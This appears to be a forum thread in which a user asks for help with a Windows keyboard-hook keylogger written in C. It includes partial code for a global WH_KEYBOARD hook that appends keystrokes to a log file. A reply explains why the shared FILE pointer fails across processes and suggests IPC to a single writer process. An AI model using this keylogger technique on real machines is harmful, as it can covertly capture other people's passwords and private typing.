I am making a keylogger using Windows Hooks.
The code is inside a DLL. Characters typed are to be written to a file.
However the problem is, that no characters , other than those when the focus is on my applications windows, are getting logged to the file.
The FILE * has been declared in the Shared Memory segment.
#pragma data_seg("SHARED")
.
.
FILE* iFile = NULL;
#pragma data_seg()
If i open the file inside the hook function , everything seems to be fine.
EXPORT LRESULT CALLBACK KHookProc(int nCode, WPARAM wparam, LPARAM lparam)
{
.
.
.
iFile = fopen("c:\\games\\log.txt","a+");
fwrite((char *)(&c),1,1,iFile);
fclose(iFile);
}
}
If i open it while setting the hook(common for all the processes) none but my applications keystrokes are captured.
EXPORT void SetKBHook()
{
if(hhook==NULL)
{
hhook = SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KHookProc,g_hinstance,NULL);
if(hhook == NULL)
{
DWORD err = GetLastError();
err;
}
iFile = fopen("c:\\games\\log.txt","a+");
}
}
help. anyone?
While the pointer variable can be shared between processes (if you’re passing correct arguments to the linker), neither the heap-allocated data structure the FILE* is pointing to, nor the underlying Win32 file handle (and associated kernel-mode file object) are shared.
You best would be having the file handle open in a single process (the one launching the keylogger), then using an IPC mechanism to transfer data back to this process, which will then handle the (properly synchronized) writes.
This will work just fine for any kind of legitimate keylogging purposes, and will avoid a lot of headaches trying to share file handles into processes you didn’t launch yourself… Not to mention synchronization blues should you succeed with the first task.